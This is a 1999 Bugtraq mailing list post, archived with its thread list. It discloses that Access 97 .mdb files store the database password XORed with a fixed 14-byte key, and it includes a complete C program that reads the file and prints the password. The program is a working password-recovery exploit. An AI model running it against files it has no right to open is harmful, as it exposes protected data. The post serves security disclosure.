Bugtraq mailing list archives
Re: Microsoft Access 97 Stores Database Password as Plaintext
From: jim () JTAN COM (Jim Paris)
Date: Tue, 9 Feb 1999 17:46:27 -0500
The following text was posted to USENET, and indexed on a Russian cypherpunk site. I found it when I was doing some work with Access 97 databses. I think you will agree that this particular "feature" makes the linked database password issue moot.
Most definately!
Anyway, Access97 passwords are stored in the 13 bytes from offset 0x42 in a .mdb file. Do a bitwise XOR with 0x86, 0xFB, 0xEC, 0x37, 0x5D, 0x44, 0x9C, 0xFA, 0xC6, 0x5E, 0x28, 0xE6, 0x13 to recover the plaintext. I think that if the first byte is 0x86, the password is not checked.
Minor correction: the passwords can be a maximum of 14 bytes. The last XOR value is 0xD8. Here's a quick program to test this lack of security: /* snip here */ #include <stdio.h> #include <stdlib.h> int main(int argc, char *argv[]) { FILE *mdb; int i; char ch; int secret[14]={ 0x86,0xFB,0xEC,0x37, 0x5D,0x44,0x9C,0xFA, 0xC6,0x5E,0x28,0xE6, 0x13,0xD8 }; if(argc<2) { fprintf(stderr,"usage: %s filename.mdb\n",argv[0]); return 1; } if((mdb=fopen(argv[1],"rb"))==NULL) { fprintf(stderr,"%s: can't open %s\n",argv[0],argv[1]); return 1; } fseek(mdb,0x42,SEEK_SET); printf("The password is: "); for(i=0;i<14;i++) { if((ch=fgetc(mdb)^secret[i])==0) break; putchar(ch); } if(i==0) printf("(none)"); putchar('\n'); fclose(mdb); return 0; } /* snip here */ -jim
Current thread:
- Re: Microsoft Access 97 Stores Database Password as Plaintext, (continued)
- Re: Microsoft Access 97 Stores Database Password as Plaintext Donald Moore (Feb 04)
- Re: Microsoft Access 97 Stores Database Password as Plaintext Allan Marillier (Feb 04)
- Re: Microsoft Access 97 Stores Database Password as Plaintext Kehoe, Anthony (Feb 05)
- FW: Microsoft Access 97 Stores Database Password as Plaintext Eric Stevens (Feb 05)
- Re: Microsoft Access 97 Stores Database Password as Plaintext Fernald, Brian (Feb 05)
- Re: Microsoft Access 97 Stores Database Password as Plaintext Sozni (Feb 05)
- Re: Microsoft Access 97 Stores Database Password as Plaintext Ervin Fried (Feb 05)
- Re: Microsoft Access 97 Stores Database Password as Plaintext sozni () USA NET (Feb 08)
- Pine _again_ :) Chris Evans (Feb 08)
- Re: Microsoft Access 97 Stores Database Password as Plaintext Stephen M. Milton (Feb 08)
- Re: Microsoft Access 97 Stores Database Password as Plaintext Jim Paris (Feb 09)
- Re: Microsoft Access 97 Stores Database Password as Plaintext Jim Paris (Feb 09)
- SECURITY: new wu-ftpd packages available (fwd) RHS Linux User (Feb 09)
- Re: SECURITY: new wu-ftpd packages available (fwd) Ronald Wahl (Feb 10)
- Pro/wuFTPD DoS (Was: Re: SECURITY: new wu-ftpd packages available Ken Williams (Feb 11)
- Re: Microsoft Access 97 Stores Database Password as Plaintext Billy Naylor (Feb 12)
- Re: Microsoft Access 97 Stores Database Password as Plaintext Ian Smith (Feb 12)
- Applets listening on Sockets in Java Tim Wright (Feb 12)
- Applets listening on Sockets in Java Lincoln Stein (Feb 13)